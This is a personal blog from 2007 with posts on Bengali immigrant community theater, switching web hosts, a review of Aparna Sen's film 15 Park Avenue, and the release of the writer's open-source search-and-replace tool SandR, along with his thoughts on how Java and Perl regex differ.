After being involved with immigrant Bengali community theater for about 7-8 years, what I find most challenging is to capture the imagination of the community. The issues, the problems, the dreams, the hopes, the frustrations, the achievements of the first generation immigrants are different from the folks back home. Yes, this is true that the first generation, especially we the Bengalis, do enjoy living in a bubble of nostalgia when it comes to culture. We prefer Rabindrasangeet over classic Jazz, Bhimsen Joshi over George Gershwin, Kishore Kumar over Norah Jones. We prefer to go and see the current crops of group theater when we visit Kolkata, but seldom make attempts to see the local repertory theater's productions. However, we do live our lives outside that bubble and constantly get challenged by a different world than what we used to face back home. Our theater should capture that.

In Ron, I thought, Sudiptada could strike the golden balance there where he could evoke a sense of nostalgia within the realm of our everyday existence. Our third production Chhenra Collage also struck that balance, it seems. Even after our tenth production some of the regular audience still refer to the third production. I may have some conjectures as to why this is happening, but cannot really tell for sure. But one thing is for sure, I like to continue doing this kind of theater where we can introspect our contemporary lives with compassion and humor.

Friday, November 09, 2007

One more host change

For the past few days I have been busy with accommodating another change of my host. This is my second change in as many months. I was hosting with 1and1.com since 2005. It was a decent host - excellent top notch service as far as server up-time, availability and speed are concerned. However, two of the peeves that I had were that it didn't offer enough features for the dough and there was no ssh service for my plan. 1and1.com also seems to have configured its service in a nonstandard way. For example, even with your own domain, your mail server domains will be 1and1.com; you cannot choose your own username for login, you are forced to remember some random string of digits.

So I moved my host to Dreamhost in October. It has a very impressive array of features for a very decent price. I have seen its server hold quite firm after a digg effect on one of the domains it hosted. I also read some reviews which, even though they didn't put it in the top performer slot, nevertheless put it somewhere near there. Since my site is a very, very low traffic site, I didn't bother. But I should have. After moving, I spent quite a bit of time redesigning my site, only to discover that server response is not very good - barely acceptable. But the real damper was its mail server. The server that hosted my mailserver had a history of problems and Dreamhost was in the process of upgrading the hardware when I moved my host. Dada was complaining that he basically couldn't do anything on his mailbox. He was connecting via IMAP. The only thing he could do was download the headers, but the server timed out 9 out of 10 times while downloading the body. I thought it was temporary. But even after the claimed hardware upgrade, things didn't improve. At that point I decided to quit. But to be fair, I must say that I didn't have any problem connecting to the mail server using POP3. In conclusion, I think Dreamhost has good intentions and all the makings of a good host, but it may need to put a lot more focus on performance at this time.

Then enters HostMonster. I read very good reviews about the host. More than one review site put it on the top of the heap. It claims to host more than 200,000 domains. Even though most of the things in all Linux hosts are almost the same, they have enough differences in settings that warrant at least a couple of days of tweaking my code to run seamlessly. Same story here. Finally I think I am done. The jury is still out, but so far I am seeing improved speed of access. Dada informed me that he now has no problem with mail connection using IMAP. Hopefully I can stay with these guys for some time.

Thursday, October 25, 2007

15 Park Avenue

I have been a cursory follower of Aparna Sen's works. The ones that I have seen are Parama, Paramitar Ekdin and 15 Park Avenue. I have seen neither 36 Chowrangee Lane nor Mr and Mrs Iyer - the two most acclaimed movies of Aparna. I haven't seen Sati or Yugant either. And though I watched the telefilm Picnic, I don't remember anything from that movie except a shot where (I think) Farida Jalal singing 'mera laal duptta malmalka'.

For me Parama was a disaster. But I liked Paramitar Ekdin quite a bit. Aparna's narrative style and treatment of the subject went well. And the acting from Rituparna and Sohini stood out.

I can say almost similar things about 15 Park Avenue. The narrative style went well with the subject. Acting was quite good all around. But I have some peeves about the character development. Take the case of Anjali, done by Shabana Azmi. It's the weakest among the major characters of the film. It's too white with almost no grey except some patchy outbursts here and there. It takes an actress of Shabana's caliber to impart conviction to the character. The mother character played by Waheeda Rahman didn't get enough screen time to develop. Though Aparna is one of the very few directors who can create a believable female character with only a few strokes. That happened here too. Aparna's handling of human interaction between two females is also something that stands out from most of her contemporaries.

Konkana Sensharma excelled in her character. True it was the proverbial 'author-backed' character - but still it was not at all easy to play a psychological patient and a complex character. She seems to have an array of acting capabilities in her. Her face speaks with the same rich diction as does her round voice.

In the storyline, I thought, the coincidence of Joydeep (played by Rahul Bose) seeing Mithi (KS) was a spoiler. It could have been somebody else. But by bringing Joydeep back, the director was forced to spin a subplot of Joydeep's present relationship with his wife - which, to me, didn't add anything to the main plotline other than some distractions.

Another aspect in which Aparna disappoints me frequently: it's the cheap attempt at showing some universal message/philosophy. Take the scene where Mithi is forced to go through an Ojha-session. With all the onscreen hocus-pocus, the superimposed audio track plays Anjali's class lecture on quantum physics or some hifi physics topic. Where is the subtlety, Aparna? Again near the end of the film, Kunal says "She is looking for something" and Anjali replies "Aren't we all?". Jumpcut. C'mon. It's too cheesy to come from a director like Aparna.

Dhritiman was ok too, but just ok. And this is the first time that Dhritiman (as Kunal) as an actor failed to impress me.

The screenplay was good, and the film is paced well - barring a patch of 15 minutes before the movie picks up the pace again at the end. Audio (including music) design was adequate for the situations. Deep strings worked really well. The outdoor shots are convincing. Dubbing was quite well done. Though I thought there were places where the mood of the scene could have been manipulated with some more innovative light designs.

All in all, the film is a worthy one to watch and Aparna scores again as a very competent director. I will be looking forward to her to get a great film, someday.

[An old post - recycled. I wrote it in February 2006]

Wednesday, October 24, 2007

Procrastinate

This is the middle of the week. A dose of procrastination will be good for you.
[Image: Climbing and moving figures]

I have lifted it from somebody else's page. I don't know who created it or who holds the copyright. If you have information, please let me know - I will update this entry. Also, I had to scale down the image to fit in my page without messing up the formatting of the page. The full version is more interesting.

Tuesday, October 23, 2007

SandR, Java, Perl and Regular Expression

A couple of years ago, I wrote a small utility for searching and replacing text in files. At that time, I was looking for such a tool and found none that was suitable enough for my need. So I wrote it and released it as an open source software (OSS) so that others can freely download it, use it and if needed modify it. I called it SandR (pronounced as sand-arr). It was not hugely popular; people downloaded it sparingly. As of today there are altogether 1,288 downloads. I would love to see that number going up, nonetheless it was satisfying to know at least some people found it useful.

I released it as a pre-alpha version, which in the software business means, "Feel free to use it, but do expect to see bugs and crashes". Not too many bugs were reported in the last two years. So, I decided to upgrade it to "Production/Stable" status. In the process I tweaked the code for minor enhancements. Today, I have requested a release.

The unique feature of SandR is that it supports auto-detection of file encoding. I used the Java port of Mozilla's character detection algorithm for detecting the character encoding of the files. SandR also supports regular expressions for the search string, although there are some other similar OSS utilities which provide regex support.


It's really very useful that Java now supports regex, or Regular Expressions. Previously regex was a power tool for Perl programmers only. GNU had a C library for regex, but it was really the forte of Perl. So when Java 5 started supporting regex, programmers welcomed it enthusiastically. However, as we delved more into it, we found there are some differences between Perl and Java regex, nothing major though. One conversant in one will have absolutely no difficulty in understanding and using it in the other. But why? Why do there have to be two flavors of the same utility, however small the difference may be? Techies and programmers have been using regex for ages. They have become very conversant with the Perl type. Then why, oh why, introduce a minor variation? This is so Microsofty. Sun can do better. I haven't tried Java 6 yet since I do not use Java in my day job regularly, but I doubt Sun has changed the regex implementation. I don't know the plans for the upcoming Java 7 release. But let's request Sun to abolish whatever minor differences there are between the Java implementation of regex and its Perl counterpart. You can do it, Sun.